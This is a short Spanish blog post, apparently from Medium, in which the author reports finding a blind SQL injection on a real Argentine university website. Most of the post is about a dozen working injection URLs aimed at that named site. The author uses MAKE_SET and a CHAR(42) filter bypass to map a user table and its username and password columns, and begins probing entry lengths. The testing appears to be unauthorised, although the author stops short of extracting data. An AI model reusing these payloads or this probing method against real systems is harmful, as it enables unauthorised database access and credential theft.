Jugando con la página de la UTN

Siempre consideré que los sitios .edu están destinado al aprendizaje, por eso navego por las diferentes paginas universitarias probando cosas. Hoy tropecé con mi vulnerabilidad favorita en una página de la UTN: bind sqlinjection. Como se muestra en la captura de pantalla, mediante la función MAKE_SET, puede realizarse diferentes consultas sql para obtener su valor veritativo o su valor de verdad.

La dificultad más grande fue burlar una protección que filtraba el caracter * de la función COUNT, pero conseguí burlarla usando la función CHAR de sql.

Las siguientes son algunas de las consultas realizadas y sus correspondientes valores veritativos:

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28CHAR%2842%29%29%29FROM%20usuarios%29,2%29 verdad: existe la tabla usuarios

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28name%29%29FROM%20usuarios%29,2%29 falso: no existe name en usuarios

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28nombre%29%29FROM%20usuarios%29,2%29 verdad: existe nombre en usuarios

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28id%29%29FROM%20usuarios%29,2%29 falso: no existe id en usuarios

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28password%29%29FROM%20usuarios%29,2%29 Falso: no existe password en usuarios

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28clave%29%29FROM%20usuarios%29,2%29 Falso:no existe clave en usuarios

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28usuario%29%29FROM%20usuarios%29,2%29 verdadero: existe usuario de la tabla usuarios

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28idusuario%29%29FROM%20usuarios%29,2%29 verdadero idusuario

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28COUNT%28contrasenia%29%29%20FROM%20usuarios%29,2%29 contrasenia en la tabla usuario

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28LENGTH%28usuario%29%29%20FROM%20usuarios%20WHERE%20idusuario=1%29,2%29 FALSO

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28LENGTH%28usuario%29%29%20FROM%20usuarios%20WHERE%20idusuario=50%29,2%29 VERDADERO

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28LENGTH%28usuario%29%29%20FROM%20usuarios%20WHERE%20idusuario=40%29,2%29 verdadero

http://www.frro.utn.edu.ar/bolsa.php?cont=130&subc=MAKE_SET%28%28SELECT%28LENGTH%28usuario%29%29%20FROM%20usuarios%20WHERE%20idusuario=35%29,2%29 verdadero

Como se puede observar la tabla usuarios comienza su idusuario con 35. Aquí termino porque no quiero hacer nada ilegal.

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.